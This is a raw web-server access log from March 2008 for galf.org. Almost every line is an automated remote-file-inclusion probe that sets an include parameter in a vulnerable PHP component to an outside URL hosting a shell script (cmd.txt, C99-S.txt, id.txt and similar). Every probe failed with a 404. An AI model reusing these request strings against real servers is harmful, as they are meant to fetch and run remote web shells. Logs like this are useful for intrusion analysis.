81.2.252.37 - - [16/Mar/2008:18:00:13 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:18:00:49 -0700] "GET /logs/access_070730.log/index2.php?x=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:18:00:56 -0700] "GET /logs/access_071217.log/step_one.php?server_inc=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:18:00:57 -0700] "GET /step_one.php?server_inc=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:18:01:11 -0700] "GET /logs/access_071217.log/step_one.php?server_inc=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:18:01:11 -0700] "GET /step_one.php?server_inc=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
158.75.35.9 - - [16/Mar/2008:18:01:35 -0700] "GET /logs/access_071015.log/index.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
158.75.35.9 - - [16/Mar/2008:18:01:35 -0700] "GET /logs/index.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:18:02:08 -0700] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:18:02:08 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:18:02:08 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:18:02:54 -0700] "GET /logs/access_071001.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:18:03:17 -0700] "GET /logs/access_071014.log/index.php?configFile=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.68.203.22 - - [16/Mar/2008:18:03:44 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.227.48.50 - - [16/Mar/2008:18:04:17 -0700] "GET //admin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_a6mambocredits&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:18:04:18 -0700] "GET /logs/access_071008.log/index2.php?x=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
158.75.35.9 - - [16/Mar/2008:18:04:43 -0700] "GET /logs/access_071217.log/index.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
116.125.113.115 - - [16/Mar/2008:18:05:22 -0700] "GET /logs/access_071014.log//components/com_simpleboard/image_upload.php?sbp=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
116.125.113.115 - - [16/Mar/2008:18:05:30 -0700] "GET /logs/access_071014.log//components/com_simpleboard/image_upload.php?sbp=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.195.44.110 - - [16/Mar/2008:18:06:32 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.44.98 - - [16/Mar/2008:18:06:33 -0700] "GET /logs/access_071203.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.19.135.21 - - [16/Mar/2008:18:06:39 -0700] "GET //index.php?pagina=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:18:06:55 -0700] "GET /logs/access_071015.log/index.php?url=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:18:06:55 -0700] "GET /index.php?url=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:18:06:55 -0700] "GET /logs/index.php?url=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
116.125.113.115 - - [16/Mar/2008:18:08:12 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
75.126.182.170 - - [16/Mar/2008:18:08:14 -0700] "GET //index.php?go=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
158.75.35.9 - - [16/Mar/2008:18:08:16 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
116.125.113.115 - - [16/Mar/2008:18:08:16 -0700] "GET /logs/access_071231.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
116.125.113.115 - - [16/Mar/2008:18:08:17 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
116.125.113.115 - - [16/Mar/2008:18:08:17 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
124.217.247.166 - - [16/Mar/2008:18:08:42 -0700] "GET /logs//index.php4?lang=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
124.217.247.166 - - [16/Mar/2008:18:08:43 -0700] "GET //index.php4?lang=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:18:09:02 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:18:09:02 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:18:09:14 -0700] "GET /logs/access_071105.log/components/com_performs/performs.php?mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
218.150.160.162 - - [16/Mar/2008:18:09:59 -0700] "GET /logs/access_071014.log/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:18:10:14 -0700] "GET /main.php?x=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:18:10:14 -0700] "GET /logs/main.php?x=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
158.75.35.9 - - [16/Mar/2008:18:11:23 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
124.217.247.166 - - [16/Mar/2008:18:11:39 -0700] "GET /logs/admin.php?cal_dir=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
124.217.247.166 - - [16/Mar/2008:18:11:40 -0700] "GET /admin.php?cal_dir=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.203.209.2 - - [16/Mar/2008:18:12:39 -0700] "GET /logs/index3.php?pag=http://www.cedecapaulofreire.org.br/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:18:12:54 -0700] "GET /logs/access_071231.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:18:12:55 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:18:12:55 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
213.247.44.96 - - [16/Mar/2008:18:13:15 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.203.209.2 - - [16/Mar/2008:18:13:37 -0700] "GET /logs/access_080225.log/index3.php?pag=http://www.cedecapaulofreire.org.br/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.19.135.21 - - [16/Mar/2008:18:14:08 -0700] "GET //index.php?go=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
75.126.182.170 - - [16/Mar/2008:18:14:28 -0700] "GET //index.php?pagina=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.72.208.31 - - [16/Mar/2008:18:15:21 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:18:15:34 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:18:18:08 -0700] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:18:18:08 -0700] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:18:18:08 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:18:18:08 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
85.19.135.21 - - [16/Mar/2008:18:18:11 -0700] "GET /logs/access_071224.log//index.php?pagina=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.19.135.21 - - [16/Mar/2008:18:18:11 -0700] "GET /logs//index.php?pagina=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.19.135.21 - - [16/Mar/2008:18:18:37 -0700] "GET /logs/access_070723.log//index.php?pagina=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:18:20:28 -0700] "GET /logs/access_071015.log/index.php?x=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:18:20:29 -0700] "GET /index.php?x=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:18:20:29 -0700] "GET /logs/index.php?x=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:18:20:32 -0700] "GET /logs/access_080225.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:18:21:11 -0700] "GET /logs/access_080225.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:18:22:17 -0700] "GET /logs/access_071014.log/index.php?configFile=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
158.75.35.9 - - [16/Mar/2008:18:22:40 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.68.203.22 - - [16/Mar/2008:18:23:17 -0700] "GET /logs/access_070716.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.68.203.22 - - [16/Mar/2008:18:23:17 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.86.43.164 - - [16/Mar/2008:18:23:31 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
125.246.173.66 - - [16/Mar/2008:18:23:39 -0700] "GET /logs/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
125.246.173.66 - - [16/Mar/2008:18:23:39 -0700] "GET /index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:18:25:04 -0700] "GET /logs/access_080225.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:18:25:04 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:18:25:04 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.68.203.22 - - [16/Mar/2008:18:25:43 -0700] "GET /logs/access_071001.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
158.75.35.9 - - [16/Mar/2008:18:27:16 -0700] "GET /logs/access_071105.log//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.227.48.50 - - [16/Mar/2008:18:27:32 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.227.48.50 - - [16/Mar/2008:18:27:32 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
75.126.182.170 - - [16/Mar/2008:18:27:34 -0700] "GET /logs/access_071224.log//index.php?pagina=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
75.126.182.170 - - [16/Mar/2008:18:27:34 -0700] "GET /logs//index.php?pagina=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
116.125.113.115 - - [16/Mar/2008:18:27:48 -0700] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
116.125.113.115 - - [16/Mar/2008:18:27:50 -0700] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
75.126.182.170 - - [16/Mar/2008:18:28:04 -0700] "GET /logs/access_070723.log//index.php?pagina=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:18:28:39 -0700] "GET /logs/access_071217.log/index.php?x=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.130.191.252 - - [16/Mar/2008:18:29:12 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.246.21.243 - - [16/Mar/2008:18:29:27 -0700] "GET /index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.227.48.50 - - [16/Mar/2008:18:30:12 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
72.36.235.74 - - [16/Mar/2008:18:30:38 -0700] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.134.212.72 - - [16/Mar/2008:18:31:01 -0700] "GET /logs/access_071231.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.130.191.252 - - [16/Mar/2008:18:31:15 -0700] "GET /logs/access_071217.log//tools/send_reminders.php?noSet=0&includedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
158.75.35.9 - - [16/Mar/2008:18:31:42 -0700] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.30.216.90 - - [16/Mar/2008:18:31:51 -0700] "GET /logs/access_070730.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
218.237.64.193 - - [16/Mar/2008:18:32:00 -0700] "GET /logs/access_071231.log//tools/send_reminders.php?noSet=0&includedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
218.237.64.193 - - [16/Mar/2008:18:32:02 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
218.237.64.193 - - [16/Mar/2008:18:32:02 -0700] "GET /logs/access_071231.log//tools/send_reminders.php?noSet=0&includedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
218.237.64.193 - - [16/Mar/2008:18:32:02 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
218.237.64.193 - - [16/Mar/2008:18:32:03 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
89.89.224.76 - - [16/Mar/2008:18:32:12 -0700] "GET /logs/access_080310.log HTTP/1.0" 200 10577858 "-" "Wget/1.10.2" "galf.org"
158.75.35.9 - - [16/Mar/2008:18:32:20 -0700] "GET /logs/access_071001.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.14.221.150 - - [16/Mar/2008:18:32:29 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://safe-bx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
85.14.221.150 - - [16/Mar/2008:18:32:29 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://safe-bx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
212.227.48.50 - - [16/Mar/2008:18:32:30 -0700] "GET /logs//admin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_a6mambocredits&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
213.83.30.6 - - [16/Mar/2008:18:33:52 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.semfrance.com/modules/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
75.126.182.170 - - [16/Mar/2008:18:33:55 -0700] "GET /logs/access_080218.log//index.php?go=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
75.126.182.170 - - [16/Mar/2008:18:33:55 -0700] "GET /logs/access_070723.log//index.php?go=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.19.135.21 - - [16/Mar/2008:18:34:19 -0700] "GET /logs/access_080218.log//index.php?go=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.19.135.21 - - [16/Mar/2008:18:34:20 -0700] "GET /logs//index.php?go=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.19.135.21 - - [16/Mar/2008:18:34:20 -0700] "GET /logs/access_070723.log//index.php?go=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.18.207.65 - - [16/Mar/2008:18:34:38 -0700] "GET /logs/access_071008.log//oneadmin/config.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.18.207.65 - - [16/Mar/2008:18:34:38 -0700] "GET //oneadmin/config.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.18.207.65 - - [16/Mar/2008:18:34:38 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.18.207.65 - - [16/Mar/2008:18:34:56 -0700] "GET /logs/access_070924.log//oneadmin/config.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.218.85.18 - - [16/Mar/2008:18:35:01 -0700] "GET /logs/access_070917.log//tools/send_reminders.php?noSet=0&includedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [16/Mar/2008:18:35:01 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [16/Mar/2008:18:35:02 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.227.48.50 - - [16/Mar/2008:18:35:20 -0700] "GET /logs//admin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_a6mambocredits&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.227.48.50 - - [16/Mar/2008:18:35:20 -0700] "GET //admin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_a6mambocredits&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
74.52.2.130 - - [16/Mar/2008:18:36:11 -0700] "GET /index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
